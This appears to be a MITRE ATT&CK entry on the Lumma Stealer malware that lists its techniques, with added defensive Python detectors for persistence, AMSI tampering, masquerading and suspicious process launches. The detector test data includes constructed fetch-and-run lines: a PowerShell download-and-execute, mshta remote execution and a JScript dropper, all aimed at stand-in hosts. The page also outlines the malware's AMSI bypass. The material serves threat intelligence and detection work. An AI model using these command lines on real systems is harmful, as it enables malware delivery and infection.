Lumma Stealer

Lumma Stealer is an information stealer malware family in use since at least 2022. Lumma Stealer is a Malware as a Service (MaaS) where captured data has been sold in criminal markets to Initial Access Brokers.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)
ID: S1213
Associated Software: LummaStealer
Type: MALWARE
Platforms: Windows
Created: 22 Mar 2025
Last Modified: 22 Mar 2025

Associated Software Descriptions

Name Description
LummaStealer (Citation: Cybereason LumaStealer Undated)

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Lumma Stealer has used HTTP and HTTPS for command and control communication.(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Lumma Stealer has created registry keys to maintain persistence using `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Lumma Stealer has used PowerShell for initial user execution and other functions.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Fortinet LummaStealer 2024)

.006 Command and Scripting Interpreter: Python

Lumma Stealer has used malicious Python scripts to execute payloads.(Citation: Cybereason LumaStealer Undated)

.010 Command and Scripting Interpreter: AutoHotKey & AutoIT

Lumma Stealer has utilized AutoIt malware scripts and AutoIt executables.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

Lumma Stealer has gathered credential and other information from multiple browsers.(Citation: Cybereason LumaStealer Undated)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)

Enterprise T1074 .001 Data Staged: Local Data Staging

Lumma Stealer has configured a custom user data directory such as a folder within `%USERPROFILE%\AppData\Roaming` for staging data.(Citation: TrendMicro LummaStealer 2025)
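The two behaviours above leave a compact registry footprint: a value under the current user's Run key whose data points into a staging folder the user can write to, or invokes a script host. The following is an added example of how to triage such writes (it is not code from the page, from ATT&CK, or from the malware). It models Sysmon Event ID 13 fields as plain dictionaries with the keys `target_object` and `details` (field names chosen here), and the sample events, directory list and script-host list are constructed for illustration.

```python
"""Triage Run-key writes for Lumma-style persistence (added example).

Input events mimic Sysmon Event ID 13 (RegistryEvent: SetValue) fields
TargetObject/Details; the sample events below are constructed, not real telemetry.
"""
import re

# Run / RunOnce keys under any hive prefix (HKU\<SID>\..., HKLM\..., HKCU:\...).
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\", re.IGNORECASE)

# User-writable locations a stealer can stage into without elevation (illustrative list).
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\",
                 "\\programdata\\", "\\downloads\\")

# Interpreters and proxy binaries that rarely belong in a Run value (illustrative list).
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "autoit3.exe")

EXT_RE = re.compile(r"\.(?:exe|com|bat|cmd|vbs|js|ps1|hta|a3x)$", re.IGNORECASE)


def extract_target(details: str) -> str:
    """Return the program a Run value launches, without its arguments."""
    details = details.strip()
    if details.startswith('"'):                 # quoted path, possibly with spaces
        end = details.find('"', 1)
        return details[1:end] if end > 0 else details[1:]
    tokens = details.split()
    for i, tok in enumerate(tokens):
        if i > 0 and tok[0] in "-/":            # first switch: everything before it is the program
            break
        if EXT_RE.search(tok):                  # unquoted path with spaces ends at the extension
            return " ".join(tokens[: i + 1])
    return tokens[0] if tokens else ""


def triage_run_value(event: dict) -> dict:
    """Flag a registry SetValue event if it installs a suspicious autostart entry."""
    target_object = event.get("target_object", "")
    details = event.get("details", "")
    result = {"value": target_object, "target": "", "reasons": []}
    if not RUN_KEY.search(target_object):
        return result                            # not a Run key write; nothing to triage
    target = extract_target(details)
    result["target"] = target
    low_target, low_details = target.lower(), details.lower()
    image = low_target.rsplit("\\", 1)[-1]
    if any(loc in low_target for loc in USER_WRITABLE):
        result["reasons"].append("autostart target in user-writable directory")
    elif any(loc in low_details for loc in USER_WRITABLE):
        result["reasons"].append("arguments reference a user-writable directory")
    if image in SCRIPT_HOSTS or image + ".exe" in SCRIPT_HOSTS:
        result["reasons"].append(f"autostart via script/proxy host {image}")
    return result


SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
RUN_KEY_EVENTS = [  # constructed samples, not captured telemetry
    {"target_object": SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdaterSvc",
     "details": r'"C:\Users\alice\AppData\Roaming\UpdaterSvc\updater.exe" --silent'},
    {"target_object": SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync",
     "details": r"powershell -w hidden -ep bypass -f C:\Users\alice\AppData\Roaming\sys\loader.ps1"},
    {"target_object": SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r'"C:\Program Files\Vendor\Tray.exe" /background'},
    {"target_object": SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "details": "DWORD (0x00000001)"},
]


def suspicious_autostarts(events: list) -> list:
    """Return only the triage results that carry at least one reason."""
    return [r for r in map(triage_run_value, events) if r["reasons"]]


if __name__ == "__main__":
    for r in suspicious_autostarts(RUN_KEY_EVENTS):
        print(r["value"], "->", r["target"], "|", "; ".join(r["reasons"]))
```

The value's program is separated from its arguments before any path test, so an entry such as `powershell -f C:\Users\...\AppData\Roaming\...\loader.ps1` is flagged both for the script host and for the staging directory in its arguments, while a vendor tray application under `Program Files` passes untouched. Signed-binary allow-listing and per-user baselines would be the next layer in production.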

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Lumma Stealer has used HTTPS for command and control purposes.(Citation: Fortinet LummaStealer 2024)

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Lumma Stealer has utilized the .NET `ProcessStartInfo` class features to prevent the process from creating a visible window through setting the `CreateNoWindow` setting to “True,” which allows the executed command or script to run without displaying a command prompt window.(Citation: Fortinet LummaStealer 2024)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Lumma Stealer has leveraged legitimate applications to then side-load malicious DLLs during execution.(Citation: Cybereason LumaStealer Undated)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Lumma Stealer has attempted to bypass the Windows Antimalware Scan Interface (AMSI) by overwriting the string “AmsiScanBuffer” in the in-memory copy of the “clr.dll” module. The CLR resolves that AMSI export by name at run time, so once the name is gone the lookup fails and script buffers are no longer submitted for scanning.(Citation: Netskope LummaStealer 2025)
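Because the patch lives only in memory, the defensive check is to compare a module's in-memory bytes against its on-disk copy at the places where sensitive export names should sit. The code below is an added example of that comparison, not code from the page or from the malware. The disk and memory images are constructed byte buffers, and the example assumes both buffers share one layout (for instance, both taken from the mapped image) so that an offset in one is the same offset in the other; a real tool would first map file offsets to RVAs.

```python
"""Check whether AMSI/ETW export names in a loaded module still match the
on-disk copy (added example; both images below are constructed byte buffers).

Assumes the two buffers are aligned the same way (e.g. both are the mapped
image), so a file offset can be compared with the same offset in memory."""

# Names that user-mode bypasses commonly patch out (illustrative list).
SENSITIVE_NAMES = ("AmsiScanBuffer", "AmsiInitialize", "AmsiOpenSession",
                   "AmsiCloseSession", "EtwEventWrite")


def _needles(name: str):
    """Yield (encoding, bytes) for the ASCII and UTF-16LE spellings of a name."""
    yield "ascii", name.encode("ascii")
    yield "utf-16-le", name.encode("utf-16-le")


def find_name_tampering(disk: bytes, memory: bytes, names=SENSITIVE_NAMES) -> list:
    """For every occurrence of each name in `disk`, classify the same span in `memory`."""
    findings = []
    for name in names:
        for enc, needle in _needles(name):
            start = 0
            while (off := disk.find(needle, start)) != -1:
                start = off + 1
                in_mem = bytes(memory[off:off + len(needle)])
                if in_mem == needle:
                    state = "intact"
                elif not any(in_mem):
                    state = "zeroed"          # name wiped: a by-name lookup will now fail
                else:
                    state = "overwritten"     # name replaced with other bytes
                findings.append({"name": name, "encoding": enc, "offset": off,
                                 "state": state, "memory_bytes": in_mem})
    return findings


def tampered(findings: list) -> list:
    """Keep only the occurrences whose in-memory bytes differ from disk."""
    return [f for f in findings if f["state"] != "intact"]


# Constructed stand-ins for the module's string region on disk and in memory.
DISK_IMAGE = bytes(64) + b"AmsiInitialize\x00AmsiScanBuffer\x00AmsiCloseSession\x00" + bytes(32)
MEMORY_IMAGE = bytearray(DISK_IMAGE)
_pos = DISK_IMAGE.find(b"AmsiScanBuffer")
MEMORY_IMAGE[_pos:_pos + len(b"AmsiScanBuffer")] = bytes(len(b"AmsiScanBuffer"))  # the simulated patch

if __name__ == "__main__":
    for f in tampered(find_name_tampering(DISK_IMAGE, MEMORY_IMAGE)):
        print(f"{f['name']} ({f['encoding']}) at 0x{f['offset']:x}: {f['state']}")
```

Comparing only the spans that hold known names, rather than the whole image, avoids false positives from relocations and import-table fix-ups that legitimately differ between disk and memory. Both ASCII and UTF-16LE spellings are checked because Windows modules carry export names in either form depending on how they are consumed.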

Enterprise T1036 .008 Masquerading: Masquerade File Type

Lumma Stealer has used payloads that resemble benign file extensions such as .mp3, .accdb, and .pub, though the files contained malicious JavaScript content.(Citation: Netskope LummaStealer 2025)
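A file's extension is only a claim; its leading bytes are the evidence. The following added example (not code from the page or from the malware) checks the three extensions named above against their real file signatures and separately tests whether the content reads as script text. The signatures are standard for these formats; the sample files, the script-keyword list and the 90% printable threshold are constructed and illustrative.

```python
"""Spot payloads whose extension claims a media/database format but whose
content is script text (added example; sample files below are constructed)."""
import re

# Leading byte signatures for the extensions the page reports being abused.
MAGIC = {
    ".mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),   # ID3v2 tag or MPEG audio frame sync
    ".accdb": (b"\x00\x01\x00\x00Standard ACE DB",),            # Access 2007+ database header
    ".pub": (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",),              # OLE2 compound file (Publisher)
}

# Tokens common in JScript/VBScript droppers and almost absent from binary media (illustrative).
SCRIPT_MARKERS = re.compile(
    rb"\bvar\b|\bfunction\b|\beval\s*\(|new\s+ActiveXObject|WScript\.|String\.fromCharCode|CreateObject\s*\(",
    re.IGNORECASE,
)


def looks_like_script(data: bytes) -> bool:
    """True if the leading bytes are overwhelmingly printable text containing script keywords."""
    sample = data[:4096]
    if not sample:
        return False
    printable = sum(1 for b in sample if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(sample) > 0.9 and SCRIPT_MARKERS.search(sample) is not None


def check_file_type(name: str, data: bytes) -> dict:
    """Compare the claimed extension against the actual leading bytes."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    result = {"name": name, "ext": ext, "magic_ok": None,
              "script_content": looks_like_script(data), "verdict": ""}
    signatures = MAGIC.get(ext)
    if signatures is None:
        result["verdict"] = "no signature for extension"
        return result
    result["magic_ok"] = any(data.startswith(sig) for sig in signatures)
    if result["script_content"]:
        result["verdict"] = f"masquerade: script content behind {ext}"
    elif result["magic_ok"]:
        result["verdict"] = "consistent"
    else:
        result["verdict"] = f"mismatch: header does not match {ext}"
    return result


SAMPLE_FILES = {  # constructed samples, not real files
    "song.mp3": b"ID3\x04\x00\x00\x00\x00\x00\x00" + bytes(64),
    "report.accdb": b"\x00\x01\x00\x00Standard ACE DB\x00" + bytes(64),
    "flyer.pub": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(64),
    "track.mp3": b'var sh = new ActiveXObject("WScript.Shell");\r\n'
                 b'sh.Run("mshta https://example.invalid/x.hta", 0);\r\n',
    "notes.txt": b"meeting at 10\n",
}


def scan(files: dict) -> dict:
    """Map each file name to its verdict."""
    return {name: check_file_type(name, data)["verdict"] for name, data in files.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES).items():
        print(f"{name:14} {verdict}")
```

Script content wins over a matching header on purpose: a file that both starts with a valid ID3 tag and contains `new ActiveXObject(...)` is still the more interesting finding. For other extensions the check returns "no signature for extension" rather than guessing.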

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Lumma Stealer has used AES-encrypted payloads contained within PowerShell scripts.(Citation: Qualys LummaStealer 2024)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Lumma Stealer has been delivered through phishing emails with malicious attachments.(Citation: Cybereason LumaStealer Undated)

.002 Phishing: Spearphishing Link

Lumma Stealer has been delivered through phishing emails containing malicious links.(Citation: Cybereason LumaStealer Undated)

Enterprise T1055 .012 Process Injection: Process Hollowing

Lumma Stealer has used process hollowing leveraging a legitimate program such as “BitLockerToGo.exe” to inject a malicious payload.(Citation: Qualys LummaStealer 2024)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

Lumma Stealer has detected antivirus processes using commands such as “tasklist” and “findstr.”(Citation: Qualys LummaStealer 2024)

Enterprise T1176 .001 Software Extensions: Browser Extensions

Lumma Stealer has installed a malicious browser extension to target Google Chrome, Microsoft Edge, Opera and Brave browsers for the purpose of stealing data.(Citation: Cybereason LumaStealer Undated)

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Lumma Stealer has used valid code signing digital certificates from ConsolHQ LTD and Verandah Green Limited to appear legitimate.(Citation: TrendMicro LummaStealer 2025)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Lumma Stealer has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citation: Netskope LummaStealer 2025)
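The `tasklist`/`findstr` probe described under T1518.001, the mshta proxy execution above, and the hidden or encoded PowerShell launches described under T1059.001 all surface in process-creation telemetry. The code below is one added detection pass over such events (not code from the page, from ATT&CK, or from the malware). Events are modelled as dictionaries with the keys `image`, `command_line` and `parent_command_line`, mirroring Sysmon Event ID 1 fields; the field names, the security-product token list and all sample events are constructed for illustration, and the encoded PowerShell command is generated inline rather than copied from any real sample.

```python
"""Detect Lumma-style execution tradecraft in process-creation events (added example).

Events mimic Sysmon Event ID 1 fields (Image, CommandLine, ParentCommandLine);
the samples below are constructed, not captured telemetry."""
import base64
import re

# Process-name fragments of security products worth looking for in a
# tasklist|findstr probe (illustrative list).
AV_TOKENS = ("avast", "avg", "bitdefender", "kaspersky", "eset", "sophos",
             "msmpeng", "mcafee", "norton", "crowdstrike", "sentinel")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the UTF-16LE text behind -EncodedCommand (any prefix of the switch,
    e.g. -e, -ec, -enc), or None if the command line carries none."""
    for flag, blob in re.findall(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", command_line, re.IGNORECASE):
        if not "encodedcommand".startswith(flag.lower()):
            continue                      # e.g. -ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(event: dict) -> list:
    """Return the technique findings for one process-creation event."""
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    combined = (cmd + " " + event.get("parent_command_line", "")).lower()
    findings = []

    # T1518.001: tasklist output filtered through findstr for security-product names.
    if "tasklist" in combined and "findstr" in combined:
        hits = [t for t in AV_TOKENS if t in combined]
        if hits:
            findings.append({"technique": "T1518.001",
                             "detail": "tasklist|findstr probing for " + ", ".join(hits)})

    # T1218.005: mshta handed a URL or an inline script protocol instead of a local .hta.
    if image == "mshta.exe" and re.search(r"https?://|\b(?:javascript|vbscript|about):", cmd, re.IGNORECASE):
        findings.append({"technique": "T1218.005", "detail": "mshta executing remote or inline content"})

    # T1059.001: PowerShell started with a hidden window and/or an encoded command.
    if image in ("powershell.exe", "pwsh.exe"):
        if re.search(r"-w[a-z]*\s+hidden", cmd, re.IGNORECASE):
            findings.append({"technique": "T1059.001", "detail": "hidden window requested"})
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append({"technique": "T1059.001", "detail": "encoded command: " + decoded})
    return findings


# Constructed encoded payload: built here so the sample is reproducible, not copied from malware.
STAGE2_TEXT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2_TEXT.encode("utf-16-le")).decode("ascii")

PROCESS_EVENTS = [  # constructed samples, not captured telemetry
    {"image": r"C:\Windows\System32\findstr.exe",
     "command_line": 'findstr /I "avast bitdefender kaspersky"',
     "parent_command_line": 'cmd.exe /c tasklist | findstr /I "avast bitdefender kaspersky"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/update.hta",
     "parent_command_line": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}",
     "parent_command_line": r'"C:\Users\alice\Downloads\setup.exe"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt",
     "parent_command_line": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1",
     "parent_command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
]


def run_detections(events: list) -> list:
    """Return (event index, technique) pairs for every finding across the events."""
    return [(i, f["technique"]) for i, ev in enumerate(events) for f in analyze(ev)]


if __name__ == "__main__":
    for i, ev in enumerate(PROCESS_EVENTS):
        for f in analyze(ev):
            print(f"[{i}] {f['technique']}: {f['detail']}")
```

Decoding the `-EncodedCommand` payload matters more than flagging the switch: the decoded text is what an analyst pivots on, and the decoder rejects a switch such as `-ExecutionPolicy` that merely shares the `-e` prefix. The parent command line is folded into the T1518.001 check because `findstr` usually appears as its own process with `tasklist` visible only in the parent `cmd.exe` invocation.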

.015 System Binary Proxy Execution: Electron Applications

Lumma Stealer has leveraged Electron applications to disable GPU sandboxing to avoid detection by security software.(Citation: TrendMicro LummaStealer 2025)

Enterprise T1204 .002 User Execution: Malicious File

Lumma Stealer has gained initial execution through victims opening malicious executable files embedded in zip archives, and MSI files within RAR files.(Citation: Cybereason LumaStealer Undated)

Enterprise T1497 .001 Virtualization/Sandbox Evasion: System Checks

Lumma Stealer has queried system resources on the victim device to identify if it is executing in a sandbox or virtualized environments, checking usernames, conducting WMI queries for system details, checking for files commonly found in virtualized environments, searching system services, and inspecting process names.(Citation: Fortinet LummaStealer 2024) Lumma Stealer has checked system GPU configurations for sandbox detection.(Citation: TrendMicro LummaStealer 2025)